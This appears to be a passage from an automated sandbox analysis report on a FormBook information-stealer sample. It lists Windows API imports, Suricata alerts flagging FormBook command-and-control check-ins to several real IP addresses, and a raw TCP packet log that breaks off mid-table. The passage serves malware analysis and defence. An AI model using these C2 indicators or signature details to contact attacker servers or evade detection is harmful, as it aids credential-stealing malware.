AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

                Possible Origin

                Language of compilation systemCountry where language is spokenMap
                EnglishGreat Britain

                Network Behavior

                Suricata IDS Alerts

                TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                2024-08-19T04:29:45.770188+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M316190980192.168.2.4104.21.45.56
                2024-08-19T04:27:15.619235+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314974280192.168.2.4208.91.197.27
                2024-08-19T04:26:45.953305+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314973780192.168.2.4217.160.0.106
                2024-08-19T04:29:43.220807+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M316190880192.168.2.4104.21.45.56
                2024-08-19T04:28:59.083931+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M516189880192.168.2.4199.192.19.19
                2024-08-19T04:25:50.548648+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M516191080192.168.2.4104.21.45.56
                2024-08-19T04:26:51.139925+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314973980192.168.2.4217.160.0.106
                2024-08-19T04:28:08.800729+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M316188980192.168.2.4194.9.94.85
                2024-08-19T04:26:30.209134+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514973680192.168.2.45.44.111.162
                2024-08-19T04:28:45.803748+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M516189480192.168.2.423.251.54.212
                2024-08-19T04:28:03.640634+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M316188780192.168.2.4194.9.94.85
                2024-08-19T04:27:18.166411+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314974380192.168.2.4208.91.197.27
                2024-08-19T04:28:23.394049+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M316189380192.168.2.423.251.54.212
                2024-08-19T04:29:18.369749+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M316190380192.168.2.491.195.240.19
                2024-08-19T04:26:48.524707+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314973880192.168.2.4217.160.0.106
                2024-08-19T04:29:26.074038+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M516190680192.168.2.491.195.240.19
                2024-08-19T04:29:12.619341+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M516190280192.168.2.4213.145.228.16
                2024-08-19T04:26:53.621214+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514974180192.168.2.4217.160.0.106
                2024-08-19T04:28:20.846261+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M316189280192.168.2.423.251.54.212
                2024-08-19T04:28:56.555569+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M316189780192.168.2.4199.192.19.19
                2024-08-19T04:28:06.168191+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M316188880192.168.2.4194.9.94.85
                2024-08-19T04:28:53.995546+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M316189680192.168.2.4199.192.19.19
                2024-08-19T04:27:46.320412+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M316188580192.168.2.443.252.167.188
                2024-08-19T04:28:11.205183+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M516189080192.168.2.4194.9.94.85
                2024-08-19T04:29:23.565167+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M316190580192.168.2.491.195.240.19
                2024-08-19T04:29:40.691998+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M316190780192.168.2.4104.21.45.56
                2024-08-19T04:27:41.892608+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M316188380192.168.2.443.252.167.188
                2024-08-19T04:28:51.482298+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M316189580192.168.2.4199.192.19.19
                2024-08-19T04:27:20.693670+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314974480192.168.2.4208.91.197.27
                2024-08-19T04:27:24.986327+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514974580192.168.2.4208.91.197.27
                2024-08-19T04:27:57.855403+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M516188680192.168.2.443.252.167.188
                2024-08-19T04:29:07.504399+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M316190080192.168.2.4213.145.228.16
                2024-08-19T04:29:10.035756+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M316190180192.168.2.4213.145.228.16
                2024-08-19T04:27:44.424571+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M316188480192.168.2.443.252.167.188
                2024-08-19T04:29:04.930341+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M316189980192.168.2.4213.145.228.16
                2024-08-19T04:28:18.314367+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M316189180192.168.2.423.251.54.212
                2024-08-19T04:29:20.919756+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M316190480192.168.2.491.195.240.19

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Aug 19, 2024 04:26:29.502394915 CEST4973680192.168.2.45.44.111.162
                Aug 19, 2024 04:26:29.507535934 CEST80497365.44.111.162192.168.2.4
                Aug 19, 2024 04:26:29.507661104 CEST4973680192.168.2.45.44.111.162
                Aug 19, 2024 04:26:29.510755062 CEST4973680192.168.2.45.44.111.162
                Aug 19, 2024 04:26:29.515681982 CEST80497365.44.111.162192.168.2.4
                Aug 19, 2024 04:26:30.208937883 CEST80497365.44.111.162192.168.2.4
                Aug 19, 2024 04:26:30.209012985 CEST80497365.44.111.162192.168.2.4
                Aug 19, 2024 04:26:30.209134102 CEST4973680192.168.2.45.44.111.162
                Aug 19, 2024 04:26:30.213121891 CEST4973680192.168.2.45.44.111.162
                Aug 19, 2024 04:26:30.218030930 CEST80497365.44.111.162192.168.2.4
                Aug 19, 2024 04:26:45.275054932 CEST4973780192.168.2.4217.160.0.106
                Aug 19, 2024 04:26:45.279987097 CEST8049737217.160.0.106192.168.2.4
                Aug 19, 2024 04:26:45.280128956 CEST4973780192.168.2.4217.160.0.106
                Aug 19, 2024 04:26:45.282705069 CEST4973780192.168.2.4217.160.0.106
                Aug 19, 2024 04:26:45.287636995 CEST8049737217.160.0.106192.168.2.4
                Aug 19, 2024 04:26:45.953080893 CEST8049737217.160.0.106192.168.2.4
                Aug 19, 2024 04:26:45.953202963 CEST8049737217.160.0.106192.168.2.4
                Aug 19, 2024 04:26:45.953305006 CEST4973780192.168.2.4217.160.0.106
                Aug 19, 2024 04:26:46.798593998 CEST4973780192.168.2.4217.160.0.106
                Aug 19, 2024 04:26:47.818336964 CEST4973880192.168.2.4217.160.0.106
                Aug 19, 2024 04:26:47.823282003 CEST8049738217.160.0.106192.168.2.4
                Aug 19, 2024 04:26:47.823388100 CEST4973880192.168.2.4217.160.0.106
                Aug 19, 2024 04:26:47.825927019 CEST4973880192.168.2.4217.160.0.106
                Aug 19, 2024 04:26:47.830943108 CEST8049738217.160.0.106192.168.2.4
                Aug 19, 2024 04:26:48.524555922 CEST8049738217.160.0.106192.168.2.4
                Aug 19, 2024 04:26:48.524626970 CEST8049738217.160.0.106192.168.2.4
                Aug 19, 2024 04:26:48.524707079 CEST4973880192.168.2.4217.160.0.106
                Aug 19, 2024 04:26:49.340961933 CEST4973880192.168.2.4217.160.0.106
                Aug 19, 2024 04:26:50.349441051 CEST4973980192.168.2.4217.160.0.106
                Aug 19, 2024 04:26:50.354532003 CEST8049739217.160.0.106192.168.2.4
                Aug 19, 2024 04:26:50.354650974 CEST4973980192.168.2.4217.160.0.106
                Aug 19, 2024 04:26:50.357610941 CEST4973980192.168.2.4217.160.0.106
                Aug 19, 2024 04:26:50.362590075 CEST8049739217.160.0.106192.168.2.4
                Aug 19, 2024 04:26:50.362620115 CEST8049739217.160.0.106192.168.2.4
                Aug 19, 2024 04:26:50.362672091 CEST8049739217.160.0.106192.168.2.4
                Aug 19, 2024 04:26:50.362699986 CEST8049739217.160.0.106192.168.2.4
                Aug 19, 2024 04:26:50.362725973 CEST8049739217.160.0.106192.168.2.4
                Aug 19, 2024 04:26:50.362775087 CEST8049739217.160.0.106192.168.2.4
                Aug 19, 2024 04:26:50.362802029 CEST8049739217.160.0.106192.168.2.4
                Aug 19, 2024 04:26:50.362847090 CEST8049739217.160.0.106192.168.2.4
                Aug 19, 2024 04:26:50.362874031 CEST8049739217.160.0.106192.168.2.4
                Aug 19, 2024 04:26:51.139810085 CEST8049739217.160.0.106192.168.2.4
                Aug 19, 2024 04:26:51.139847994 CEST8049739217.160.0.106192.168.2.4
                Aug 19, 2024 04:26:51.139925003 CEST4973980192.168.2.4217.160.0.106
                Aug 19, 2024 04:26:51.864989042 CEST4973980192.168.2.4217.160.0.106
                Aug 19, 2024 04:26:52.947217941 CEST4974180192.168.2.4217.160.0.106
                Aug 19, 2024 04:26:52.952446938 CEST8049741217.160.0.106192.168.2.4
                Aug 19, 2024 04:26:52.952541113 CEST4974180192.168.2.4217.160.0.106
                Aug 19, 2024 04:26:52.966120958 CEST4974180192.168.2.4217.160.0.106
                Aug 19, 2024 04:26:52.971066952 CEST8049741217.160.0.106192.168.2.4
                Aug 19, 2024 04:26:53.620855093 CEST8049741217.160.0.106192.168.2.4
                Aug 19, 2024 04:26:53.621151924 CEST8049741217.160.0.106192.168.2.4
                Aug 19, 2024 04:26:53.621213913 CEST4974180192.168.2.4217.160.0.106
                Aug 19, 2024 04:26:53.624502897 CEST4974180192.168.2.4217.160.0.106
                Aug 19, 2024 04:26:53.630100012 CEST8049741217.160.0.106192.168.2.4
                Aug 19, 2024 04:27:15.144103050 CEST4974280192.168.2.4208.91.197.27
                Aug 19, 2024 04:27:15.148960114 CEST8049742208.91.197.27192.168.2.4
                Aug 19, 2024 04:27:15.149051905 CEST4974280192.168.2.4208.91.197.27
                Aug 19, 2024 04:27:15.151654959 CEST4974280192.168.2.4208.91.197.27
                Aug 19, 2024 04:27:15.156450987 CEST8049742208.91.197.27192.168.2.4
                Aug 19, 2024 04:27:15.619090080 CEST8049742208.91.197.27192.168.2.4
                Aug 19, 2024 04:27:15.619235039 CEST4974280192.168.2.4208.91.197.27
                Aug 19, 2024 04:27:16.658363104 CEST4974280192.168.2.4208.91.197.27
                Aug 19, 2024 04:27:16.664901972 CEST8049742208.91.197.27192.168.2.4
                Aug 19, 2024 04:27:17.677784920 CEST4974380192.168.2.4208.91.197.27
                Aug 19, 2024 04:27:17.682990074 CEST8049743208.91.197.27192.168.2.4
                Aug 19, 2024 04:27:17.683125973 CEST4974380192.168.2.4208.91.197.27
                Aug 19, 2024 04:27:17.685692072 CEST4974380192.168.2.4208.91.197.27
                Aug 19, 2024 04:27:17.694739103 CEST8049743208.91.197.27192.168.2.4
                Aug 19, 2024 04:27:18.166321039 CEST8049743208.91.197.27192.168.2.4
                Aug 19, 2024 04:27:18.166410923 CEST4974380192.168.2.4208.91.197.27
                Aug 19, 2024 04:27:19.189441919 CEST4974380192.168.2.4208.91.197.27
                Aug 19, 2024 04:27:19.198913097 CEST8049743208.91.197.27192.168.2.4
                Aug 19, 2024 04:27:20.211075068 CEST4974480192.168.2.4208.91.197.27
                Aug 19, 2024 04:27:20.216212034 CEST8049744208.91.197.27192.168.2.4
                Aug 19, 2024 04:27:20.216295958 CEST4974480192.168.2.4208.91.197.27
                Aug 19, 2024 04:27:20.219614983 CEST4974480192.168.2.4208.91.197.27
                Aug 19, 2024 04:27:20.224463940 CEST8049744208.91.197.27192.168.2.4
                Aug 19, 2024 04:27:20.224601030 CEST8049744208.91.197.27192.168.2.4
                Aug 19, 2024 04:27:20.224630117 CEST8049744208.91.197.27192.168.2.4
                Aug 19, 2024 04:27:20.224678040 CEST8049744208.91.197.27192.168.2.4
                Aug 19, 2024 04:27:20.224704981 CEST8049744208.91.197.27192.168.2.4
                Aug 19, 2024 04:27:20.224844933 CEST8049744208.91.197.27192.168.2.4
                Aug 19, 2024 04:27:20.224873066 CEST8049744208.91.197.27192.168.2.4
                Aug 19, 2024 04:27:20.224903107 CEST8049744208.91.197.27192.168.2.4
                Aug 19, 2024 04:27:20.224982023 CEST8049744208.91.197.27192.168.2.4
                Aug 19, 2024 04:27:20.693571091 CEST8049744208.91.197.27192.168.2.4
                Aug 19, 2024 04:27:20.693670034 CEST4974480192.168.2.4208.91.197.27
                Aug 19, 2024 04:27:21.781035900 CEST4974480192.168.2.4208.91.197.27
                Aug 19, 2024 04:27:21.786087036 CEST8049744208.91.197.27192.168.2.4
                Aug 19, 2024 04:27:22.786977053 CEST4974580192.168.2.4208.91.197.27
                Aug 19, 2024 04:27:22.792057991 CEST8049745208.91.197.27192.168.2.4
                Aug 19, 2024 04:27:22.793926001 CEST4974580192.168.2.4208.91.197.27
                Aug 19, 2024 04:27:22.796072006 CEST4974580192.168.2.4208.91.197.27
                Aug 19, 2024 04:27:22.800940990 CEST8049745208.91.197.27192.168.2.4
                Aug 19, 2024 04:27:24.986201048 CEST8049745208.91.197.27192.168.2.4
                Aug 19, 2024 04:27:24.986253023 CEST8049745208.91.197.27192.168.2.4
                Aug 19, 2024 04:27:24.986310005 CEST8049745208.91.197.27192.168.2.4
                Aug 19, 2024 04:27:24.986326933 CEST4974580192.168.2.4208.91.197.27
                Aug 19, 2024 04:27:24.986341953 CEST8049745208.91.197.27192.168.2.4
                Aug 19, 2024 04:27:24.986373901 CEST8049745208.91.197.27192.168.2.4
                Aug 19, 2024 04:27:24.986453056 CEST4974580192.168.2.4208.91.197.27
                Aug 19, 2024 04:27:24.990941048 CEST4974580192.168.2.4208.91.197.27
                Aug 19, 2024 04:27:24.995771885 CEST8049745208.91.197.27192.168.2.4
                Aug 19, 2024 04:27:40.371058941 CEST6188380192.168.2.443.252.167.188
                Aug 19, 2024 04:27:40.375986099 CEST806188343.252.167.188192.168.2.4
                Aug 19, 2024 04:27:40.376070976 CEST6188380192.168.2.443.252.167.188
                Aug 19, 2024 04:27:40.378794909 CEST6188380192.168.2.443.252.167.188
                Aug 19, 2024 04:27:40.383699894 CEST806188343.252.167.188192.168.2.4
                Aug 19, 2024 04:27:41.892607927 CEST6188380192.168.2.443.252.167.188
                Aug 19, 2024 04:27:41.939672947 CEST806188343.252.167.188192.168.2.4
                Aug 19, 2024 04:27:42.910325050 CEST6188480192.168.2.443.252.167.188
                Aug 19, 2024 04:27:42.915425062 CEST806188443.252.167.188192.168.2.4
                Aug 19, 2024 04:27:42.915508032 CEST6188480192.168.2.443.252.167.188
                Aug 19, 2024 04:27:42.917068958 CEST6188480192.168.2.443.252.167.188
                Aug 19, 2024 04:27:42.922360897 CEST806188443.252.167.188192.168.2.4
                Aug 19, 2024 04:27:43.994921923 CEST806188343.252.167.188192.168.2.4
                Aug 19, 2024 04:27:43.994997025 CEST6188380192.168.2.443.252.167.188
                Aug 19, 2024 04:27:44.424571037 CEST6188480192.168.2.443.252.167.188
                Aug 19, 2024 04:27:44.475543022 CEST806188443.252.167.188192.168.2.4
                Aug 19, 2024 04:27:45.447709084 CEST6188580192.168.2.443.252.167.188
                Aug 19, 2024 04:27:45.454567909 CEST806188543.252.167.188192.168.2.4
                Aug 19, 2024 04:27:45.455224037 CEST6188580192.168.2.443.252.167.188
                Aug 19, 2024 04:27:45.457448006 CEST6188580192.168.2.443.252.167.188
                Aug 19, 2024 04:27:45.463638067 CEST806188543.252.167.188192.168.2.4
                Aug 19, 2024 04:27:45.463668108 CEST806188543.252.167.188192.168.2.4
                Aug 19, 2024 04:27:45.463732004 CEST806188543.252.167.188192.168.2.4
                Aug 19, 2024 04:27:45.463758945 CEST806188543.252.167.188192.168.2.4
                Aug 19, 2024 04:27:45.463785887 CEST806188543.252.167.188192.168.2.4
                Aug 19, 2024 04:27:45.464318991 CEST806188543.252.167.188192.168.2.4
                Aug 19, 2024 04:27:45.464345932 CEST806188543.252.167.188192.168.2.4
                Aug 19, 2024 04:27:45.464391947 CEST806188543.252.167.188192.168.2.4
                Aug 19, 2024 04:27:45.464440107 CEST806188543.252.167.188192.168.2.4
                Aug 19, 2024 04:27:46.320158958 CEST806188543.252.167.188192.168.2.4
                Aug 19, 2024 04:27:46.320336103 CEST806188543.252.167.188192.168.2.4
                Aug 19, 2024 04:27:46.320411921 CEST6188580192.168.2.443.252.167.188
                Aug 19, 2024 04:27:46.971837997 CEST6188580192.168.2.443.252.167.188
                Aug 19, 2024 04:27:47.989983082 CEST6188680192.168.2.443.252.167.188
                Aug 19, 2024 04:27:47.995187044 CEST806188643.252.167.188192.168.2.4
                Aug 19, 2024 04:27:47.995266914 CEST6188680192.168.2.443.252.167.188
                Aug 19, 2024 04:27:47.997513056 CEST6188680192.168.2.443.252.167.188
                Aug 19, 2024 04:27:48.002602100 CEST806188643.252.167.188192.168.2.4
                Aug 19, 2024 04:27:52.484155893 CEST806188443.252.167.188192.168.2.4
                Aug 19, 2024 04:27:52.484225035 CEST6188480192.168.2.443.252.167.188
                Aug 19, 2024 04:27:57.855218887 CEST806188643.252.167.188192.168.2.4
                Aug 19, 2024 04:27:57.855305910 CEST806188643.252.167.188192.168.2.4
                Aug 19, 2024 04:27:57.855402946 CEST6188680192.168.2.443.252.167.188
                Aug 19, 2024 04:27:57.858546019 CEST6188680192.168.2.443.252.167.188
                Aug 19, 2024 04:27:57.863387108 CEST806188643.252.167.188192.168.2.4
                Aug 19, 2024 04:28:02.957212925 CEST6188780192.168.2.4194.9.94.85
                Aug 19, 2024 04:28:02.962146997 CEST8061887194.9.94.85192.168.2.4
                Aug 19, 2024 04:28:02.962327957 CEST6188780192.168.2.4194.9.94.85
                Aug 19, 2024 04:28:02.964535952 CEST6188780192.168.2.4194.9.94.85
                Aug 19, 2024 04:28:02.969352961 CEST8061887194.9.94.85192.168.2.4
                Aug 19, 2024 04:28:03.640505075 CEST8061887194.9.94.85192.168.2.4
                Aug 19, 2024 04:28:03.640563011 CEST8061887194.9.94.85192.168.2.4
                Aug 19, 2024 04:28:03.640599012 CEST8061887194.9.94.85192.168.2.4
                Aug 19, 2024 04:28:03.640630960 CEST8061887194.9.94.85192.168.2.4
                Aug 19, 2024 04:28:03.640634060 CEST6188780192.168.2.4194.9.94.85
                Aug 19, 2024 04:28:03.640666008 CEST8061887194.9.94.85192.168.2.4
                Aug 19, 2024 04:28:03.640697956 CEST8061887194.9.94.85192.168.2.4
                Aug 19, 2024 04:28:03.640727997 CEST6188780192.168.2.4194.9.94.85
                Aug 19, 2024 04:28:03.640758038 CEST6188780192.168.2.4194.9.94.85
                Aug 19, 2024 04:28:04.471007109 CEST6188780192.168.2.4194.9.94.85
                Aug 19, 2024 04:28:05.491864920 CEST6188880192.168.2.4194.9.94.85
                Aug 19, 2024 04:28:05.496931076 CEST8061888194.9.94.85192.168.2.4
                Aug 19, 2024 04:28:05.497035980 CEST6188880192.168.2.4194.9.94.85
                Aug 19, 2024 04:28:05.499008894 CEST6188880192.168.2.4194.9.94.85
                Aug 19, 2024 04:28:05.503915071 CEST8061888194.9.94.85192.168.2.4
                Aug 19, 2024 04:28:06.168071985 CEST8061888194.9.94.85192.168.2.4
                Aug 19, 2024 04:28:06.168123007 CEST8061888194.9.94.85192.168.2.4
                Aug 19, 2024 04:28:06.168159008 CEST8061888194.9.94.85192.168.2.4
                Aug 19, 2024 04:28:06.168190956 CEST8061888194.9.94.85192.168.2.4
                Aug 19, 2024 04:28:06.168190956 CEST6188880192.168.2.4194.9.94.85
                Aug 19, 2024 04:28:06.168229103 CEST8061888194.9.94.85192.168.2.4
                Aug 19, 2024 04:28:06.168261051 CEST8061888194.9.94.85192.168.2.4
                Aug 19, 2024 04:28:06.168262959 CEST6188880192.168.2.4194.9.94.85
                Aug 19, 2024 04:28:06.168317080 CEST6188880192.168.2.4194.9.94.85
                Aug 19, 2024 04:28:07.001920938 CEST6188880192.168.2.4194.9.94.85
                Aug 19, 2024 04:28:08.020503998 CEST6188980192.168.2.4194.9.94.85
                Aug 19, 2024 04:28:08.025599003 CEST8061889194.9.94.85192.168.2.4
                Aug 19, 2024 04:28:08.025674105 CEST6188980192.168.2.4194.9.94.85
                Aug 19, 2024 04:28:08.027833939 CEST6188980192.168.2.4194.9.94.85
                Aug 19, 2024 04:28:08.032953024 CEST8061889194.9.94.85192.168.2.4
                Aug 19, 2024 04:28:08.032983065 CEST8061889194.9.94.85192.168.2.4
                Aug 19, 2024 04:28:08.033111095 CEST8061889194.9.94.85192.168.2.4
                Aug 19, 2024 04:28:08.033137083 CEST8061889194.9.94.85192.168.2.4
                Aug 19, 2024 04:28:08.033163071 CEST8061889194.9.94.85192.168.2.4
                Aug 19, 2024 04:28:08.033209085 CEST8061889194.9.94.85192.168.2.4
                Aug 19, 2024 04:28:08.033235073 CEST8061889194.9.94.85192.168.2.4
                Aug 19, 2024 04:28:08.033277988 CEST8061889194.9.94.85192.168.2.4
                Aug 19, 2024 04:28:08.033303976 CEST8061889194.9.94.85192.168.2.4
                Aug 19, 2024 04:28:08.800591946 CEST8061889194.9.94.85192.168.2.4
                Aug 19, 2024 04:28:08.800633907 CEST8061889194.9.94.85192.168.2.4
                Aug 19, 2024 04:28:08.800712109 CEST8061889194.9.94.85192.168.2.4
                Aug 19, 2024 04:28:08.800729036 CEST6188980192.168.2.4194.9.94.85
                Aug 19, 2024 04:28:08.800749063 CEST8061889194.9.94.85192.168.2.4
                Aug 19, 2024 04:28:08.800781965 CEST8061889194.9.94.85192.168.2.4
                Aug 19, 2024 04:28:08.800806046 CEST6188980192.168.2.4194.9.94.85
                Aug 19, 2024 04:28:08.800832987 CEST8061889194.9.94.85192.168.2.4
                Aug 19, 2024 04:28:08.800863028 CEST8061889194.9.94.85192.168.2.4
                Aug 19, 2024 04:28:08.800899029 CEST8061889194.9.94.85192.168.2.4
                Aug 19, 2024 04:28:08.800932884 CEST6188980192.168.2.4194.9.94.85
                Aug 19, 2024 04:28:08.801207066 CEST6188980192.168.2.4194.9.94.85
                Aug 19, 2024 04:28:09.534018993 CEST6188980192.168.2.4194.9.94.85
                Aug 19, 2024 04:28:10.551801920 CEST6189080192.168.2.4194.9.94.85
                Aug 19, 2024 04:28:10.556843042 CEST8061890194.9.94.85192.168.2.4
                Aug 19, 2024 04:28:10.557974100 CEST6189080192.168.2.4194.9.94.85
                Aug 19, 2024 04:28:10.561928034 CEST6189080192.168.2.4194.9.94.85
                Aug 19, 2024 04:28:10.566770077 CEST8061890194.9.94.85192.168.2.4
                Aug 19, 2024 04:28:11.205013037 CEST8061890194.9.94.85192.168.2.4
                Aug 19, 2024 04:28:11.205059052 CEST8061890194.9.94.85192.168.2.4
                Aug 19, 2024 04:28:11.205094099 CEST8061890194.9.94.85192.168.2.4
                Aug 19, 2024 04:28:11.205125093 CEST8061890194.9.94.85192.168.2.4
                Aug 19, 2024 04:28:11.205159903 CEST8061890194.9.94.85192.168.2.4
                Aug 19, 2024 04:28:11.205183029 CEST6189080192.168.2.4194.9.94.85
                Aug 19, 2024 04:28:11.205193043 CEST8061890194.9.94.85192.168.2.4
                Aug 19, 2024 04:28:11.205229044 CEST8061890194.9.94.85192.168.2.4
                Aug 19, 2024 04:28:11.205280066 CEST6189080192.168.2.4194.9.94.85
                Aug 19, 2024 04:28:11.205280066 CEST6189080192.168.2.4194.9.94.85
                Aug 19, 2024 04:28:11.205389023 CEST6189080192.168.2.4194.9.94.85
                Aug 19, 2024 04:28:11.214679956 CEST6189080192.168.2.4194.9.94.85
                Aug 19, 2024 04:28:11.219595909 CEST8061890194.9.94.85192.168.2.4
                Aug 19, 2024 04:28:16.796288967 CEST6189180192.168.2.423.251.54.212
                Aug 19, 2024 04:28:16.803108931 CEST806189123.251.54.212192.168.2.4
                Aug 19, 2024 04:28:16.806135893 CEST6189180192.168.2.423.251.54.212
                Aug 19, 2024 04:28:16.811882973 CEST6189180192.168.2.423.251.54.212
                Aug 19, 2024 04:28:16.816843033 CEST806189123.251.54.212192.168.2.4
                Aug 19, 2024 04:28:18.314367056 CEST6189180192.168.2.423.251.54.212
                Aug 19, 2024 04:28:18.359579086 CEST806189123.251.54.212192.168.2.4
                Aug 19, 2024 04:28:19.333920002 CEST6189280192.168.2.423.251.54.212
                Aug 19, 2024 04:28:19.338807106 CEST806189223.251.54.212192.168.2.4
                Aug 19, 2024 04:28:19.342020035 CEST6189280192.168.2.423.251.54.212
                Aug 19, 2024 04:28:19.346071959 CEST6189280192.168.2.423.251.54.212
                Aug 19, 2024 04:28:19.350888968 CEST806189223.251.54.212192.168.2.4
                Aug 19, 2024 04:28:20.846261024 CEST6189280192.168.2.423.251.54.212
                Aug 19, 2024 04:28:20.891495943 CEST806189223.251.54.212192.168.2.4
                Aug 19, 2024 04:28:21.878268957 CEST6189380192.168.2.423.251.54.212
                Aug 19, 2024 04:28:21.883819103 CEST806189323.251.54.212192.168.2.4
                Aug 19, 2024 04:28:21.883924007 CEST6189380192.168.2.423.251.54.212
                Aug 19, 2024 04:28:21.887839079 CEST6189380192.168.2.423.251.54.212
                Aug 19, 2024 04:28:21.894896984 CEST806189323.251.54.212192.168.2.4
                Aug 19, 2024 04:28:21.894952059 CEST806189323.251.54.212192.168.2.4
                Aug 19, 2024 04:28:21.894979954 CEST806189323.251.54.212192.168.2.4
                Aug 19, 2024 04:28:21.895005941 CEST806189323.251.54.212192.168.2.4
                Aug 19, 2024 04:28:21.895031929 CEST806189323.251.54.212192.168.2.4
                Aug 19, 2024 04:28:21.895077944 CEST806189323.251.54.212192.168.2.4
                Aug 19, 2024 04:28:21.895104885 CEST806189323.251.54.212192.168.2.4
                Aug 19, 2024 04:28:21.895132065 CEST806189323.251.54.212192.168.2.4
                Aug 19, 2024 04:28:21.895158052 CEST806189323.251.54.212192.168.2.4
                Aug 19, 2024 04:28:23.394048929 CEST6189380192.168.2.423.251.54.212
